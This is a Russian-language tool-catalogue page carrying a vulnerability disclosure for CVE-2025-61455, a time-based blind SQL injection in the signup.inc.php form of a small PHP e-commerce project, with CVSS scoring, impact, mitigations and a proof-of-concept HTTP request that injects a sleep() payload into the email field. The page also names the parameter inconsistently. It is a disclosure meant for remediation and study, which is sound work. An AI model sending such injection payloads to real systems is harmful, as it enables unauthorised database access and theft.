Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-61455 — Публичное раскрытие и proof-of-concept для CVE-2025-61455, критической SQL-инъекции в E-commerce Project v1.0, включая технические детали, PoC и рекомендации по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/tansique-17/cve-2025-61455
Анализ уязвимостейЭксплуатацияВеб-безопасностьОбучение и ОбразованиеПодобранные Ресурсы
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

Публичное раскрытие и proof-of-concept для CVE-2025-61455, критической SQL-инъекции в E-commerce Project v1.0, включая технические детали, PoC и рекомендации по смягчению последствий.

Репозиторий
10 месяцев назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ Раскрытие CVE: CVE-2025-61455 — SQL-инъекция в проекте электронной коммерции

Дата раскрытия: 14 октября 2025 г.
Идентификатор CVE: CVE-2025-61455
Серьёзность: КРИТИЧЕСКАЯ (CVSS 9.8)


🧩 Краткое описание

Критическая уязвимость SQL-инъекции существует в E-commerce Project v1.0, а именно в конечной точке signup.inc.php. Приложение напрямую включает несанитизированные пользовательские данные в SQL-запросы, что позволяет неаутентифицированным злоумышленникам обходить аутентификацию и выполнять произвольные SQL-команды.

Данной проблеме присвоен идентификатор CVE-2025-61455. На момент публичного раскрытия официального исправления не было.


📦 Затронутый продукт

  • Поставщик: Независимый (Bhabishya-123)
  • Проект: E-commerce
  • Версия: v1.0
  • Файл: signup.inc.php
  • Уязвимая конечная точка:
    https://localhost/e-commerce-main/includes/signup.inc.php

  • 🔬 Детали уязвимости

    Приложение использует несанитизированные входные данные непосредственно в SQL-запросах без какой-либо проверки входных данных или подготовленных выражений. Уязвимость существует в параметре aid файла signup.inc.php.

    Злоумышленник может внедрить вредоносный SQL-код через параметр email, что позволяет проводить атаки с использованием time-based слепой SQL-инъекции.

    Пример уязвимого шаблона кода:

    root@kitploit:~
    $query = "SELECT * FROM table WHERE email='$email'";
    

    Это позволяет использовать полезные нагрузки для инъекций, которые могут манипулировать логикой запросов и извлекать конфиденциальные данные.


    📌 Классификация CWE

    Идентификатор CWEНазвание
    CWE-89Некорректная нейтрализация специальных элементов, используемых в SQL-команде

    📊 Оценка CVSS v3.1

    БаллСерьёзностьВекторная строка
    9.8КРИТИЧЕСКАЯCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

    💥 Воздействие

    Успешная эксплуатация может привести к:

    • ✅ Полному обходу аутентификации
    • 🔓 Несанкционированному доступу к привилегированным функциям
    • 📊 Эксфильтрации данных через time-based слепую SQL-инъекцию
    • 🛠️ Возможной манипуляции или удалению данных
    • ⚠️ Полной компрометации серверной базы данных
    • 💻 Возможности удалённого выполнения кода

    🧪 Доказательство концепции (PoC)

    1. Клонирование репозитория

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. Локальный хостинг

    Используйте XAMPP/LAMP для развёртывания проекта и перейдите по адресу:

    root@kitploit:~
    http://localhost/e-commerce-main/includes/signup.inc.php
    

    3. Внедрение полезной нагрузки

    Отправьте следующий вредоносный HTTP-запрос:

    root@kitploit:~
    POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    
    name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
    

    Пояснение:
    Параметр email содержит полезную нагрузку для time-based SQL-инъекции: '+(select*from(select(sleep(20)))a)+'

    Если приложение задерживает ответ на 20 секунд, SQL-инъекция прошла успешно.


    🔐 Рекомендации

    • ✅ Замените динамические SQL-запросы на подготовленные выражения (mysqli_prepare() или PDO).
    • 🔍 Выполняйте проверку и санитизацию входных данных для всех пользовательских данных.
    • 🧱 Разверните межсетевой экран для веб-приложений (WAF) для блокировки известных шаблонов SQL-инъекций.
    • 🛡️ Проводите регулярные аудиты кода и тестирование на проникновение для раннего обнаружения.
    • 🔒 Внедрите параметризованные запросы для всех взаимодействий с базой данных.
    • 📝 Используйте списки разрешённых значений для проверки входных данных, где это возможно.

    📆 Хронология

    СобытиеДата
    Уязвимость обнаружена16 сентября 2025 г.
    Публичное раскрытие13 октября 2025 г.
    Исправление доступно❌ Недоступно на момент раскрытия

    🙋‍♂️ Авторы

    Эта уязвимость была обнаружена и ответственно раскрыта:

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 Ссылки

    • OWASP — SQL-инъекция
    • PortSwigger — SQL-инъекция
    • CVE-2025-61455 на CVE.org

    💬 Данное уведомление опубликовано независимо из-за отсутствия ответа от поставщика.

    Скачать инструмент